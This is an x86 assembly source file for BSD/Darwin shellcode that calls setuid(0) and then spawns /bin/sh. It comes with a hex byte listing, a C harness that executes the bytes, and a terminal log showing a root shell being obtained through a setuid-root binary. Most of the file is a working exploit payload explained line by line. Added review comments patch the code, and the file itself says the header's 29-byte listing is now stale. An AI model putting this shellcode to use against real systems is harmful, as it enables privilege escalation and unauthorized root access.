; Shellcode-Desc .: setuid(0) + execve() of /bin/sh  (uid only: gid and supplementary groups are left as the caller's, see the id output below)
; Shellcode-Size .: 29 bytes
; Shellcode-Id ...: a514b18340a690e6553861ef5d530eef 
; Shellcode-Arch .: x86
; Nasm-Version ...: NASM version 0.98.40 (Apple Computer, Inc. build 9) compiled on Apr  6 2006
; Ndisasm-Version : NDISASM version 0.98.40 (Apple Computer, Inc. build 9) compiled Apr  6 2006
; Tested-OSs .....: Mac OS X 10.4.x , FreeBSD 5.5-STABLE
;
; RageMan <rageman@olografix.org>
;         <rageman@s0ftpj.org>
;
; Eva:~/shellcodes rageman$ nasm execve-0x03.asm -fmacho
; Eva:~/shellcodes rageman$ ld -o execve-0x03 execve-0x03.o 
; Eva:~/shellcodes rageman$ sudo chmod 4777 execve-0x03   (review note: 4755 is sufficient -- a world-writable setuid-root file is itself a root hole, even on a scratch box)
; Eva:~/shellcodes rageman$ sudo chown root execve-0x03 
; Eva:~/shellcodes rageman$ ./execve-0x03 
; Eva:/Users/rageman/shellcodes root# id
; uid=0(root) gid=501(rageman) groups=501(rageman), 81(appserveradm), 79(appserverusr), 80(admin)
; Eva:/Users/rageman/shellcodes root# exit
; exit
; Eva:~/shellcodes rageman$ gcc -w -o execve-0x03 execve-0x03.c 
; Eva:~/shellcodes rageman$ sudo chmod 4777 execve-0x03
; Eva:~/shellcodes rageman$ sudo chown root execve-0x03
; Eva:~/shellcodes rageman$ ./execve-0x03
; Eva:/Users/rageman/shellcodes root# id
; uid=0(root) gid=501(rageman) groups=501(rageman), 81(appserveradm), 79(appserverusr), 80(admin)
; Eva:/Users/rageman/shellcodes root# exit
;
; <---execve-0x03.c-->  (harness note: shellcode[] sits in the writable data segment and is called through a function pointer; this ran on the systems listed above, but on a toolchain that enforces W^X you must first copy the bytes into a PROT_EXEC mapping, e.g. via mmap, or the call through fp faults)
; char shellcode[] =
;        "\x31\xc0\x50\x50\xb0\x17\xcd\x80"
;        "\x68\x2f\x2f\x73\x68\x68\x2f\x62"
;        "\x69\x6e\x89\xe3\x50\x54\x54\x53"
;        "\x50\xb0\x3b\xcd\x80";
;
; int main()
; {
;         void (*fp)() = shellcode;
;         fp();
; }
; <-/-execve-0x03.c-->

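BITS 32

; i386 BSD / Darwin syscall numbers. Both fit in AL, so loading them via
; `mov al, ...` keeps the payload free of NUL bytes.
SYS_setuid equ 0x17
SYS_execve equ 0x3b

GLOBAL _main

;-----------------------------------------------------------------------
; _main: setuid(0); execve("/bin//sh", {"", NULL}, {NULL});
;
; ABI: i386 BSD/Darwin syscalls take the number in eax and the arguments
; on the stack above one dummy dword that stands in for a return address
; (the kernel reads arg1 at [esp+4], arg2 at [esp+8], ...). The result
; comes back in eax; on failure eax holds the errno value, not zero.
;
; Byte constraints: no NUL byte anywhere in the encoding (zero comes from
; xor, immediates are loaded through al, and "//sh" pads the path so both
; string pushes are full NUL-free dwords). The string terminator is not
; stored as an immediate at all -- it is borrowed from a zero dword already
; on the stack (see the setuid dummy slot below).
;
; This version adds one `xor eax, eax` after setuid(0) (2 bytes, 31 c0),
; so the payload is 31 bytes, not the 29 listed in the file header; the
; byte listing there must be regenerated (nasm + ndisasm/xxd) before use.
;
; Only the uid is changed; the gid and groups remain the caller's (the id
; output in the header shows uid=0 with gid=501).
;-----------------------------------------------------------------------
_main:
                                        ; --- setuid(0) ---
        xor     eax, eax                ; eax = 0 without emitting a NUL byte
        push    eax                     ; arg1: uid_t 0
        push    eax                     ; dummy return-address slot; its four
                                        ; zero bytes also terminate the
                                        ; "/bin//sh" string pushed right below
        mov     al, SYS_setuid
        int     0x80                    ; eax = 0 on success, errno on failure

        ; Re-zero eax explicitly. Everything below uses eax both as NULL and as
        ; the base register for `mov al, SYS_execve`. If setuid(0) failed (the
        ; carrier binary is not setuid-root), eax holds errno instead of 0 and
        ; the original code pushed that as the envp/argv terminator, so execve
        ; failed (bad pointer) and no shell at all was spawned. With eax reset
        ; the payload still yields an unprivileged shell in that case.
        xor     eax, eax

                                        ; --- build "/bin//sh\0" on the stack ---
        push    0x68732f2f              ; "//sh": the extra '/' pads the path to
                                        ; exactly 8 bytes, keeping both pushes
                                        ; NUL-free
        push    0x6e69622f              ; "/bin"
        mov     ebx, esp                ; ebx = &"/bin//sh" (terminated by the
                                        ; zero dummy dword pushed above it)

                                        ; --- execve(ebx, argv, envp) ---
        push    eax                     ; zero dword: envp[0] = NULL, argv[1] =
                                        ; NULL, and the "" that argv[0] points at
        push    esp                     ; address of that zero dword; doubles as
                                        ; arg3 envp (-> {NULL}) and as argv[0]
        push    esp                     ; address of the previous slot: arg2 argv
        push    ebx                     ; arg1: path
        push    eax                     ; dummy return-address slot
        mov     al, SYS_execve
        int     0x80                    ; does not return on success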
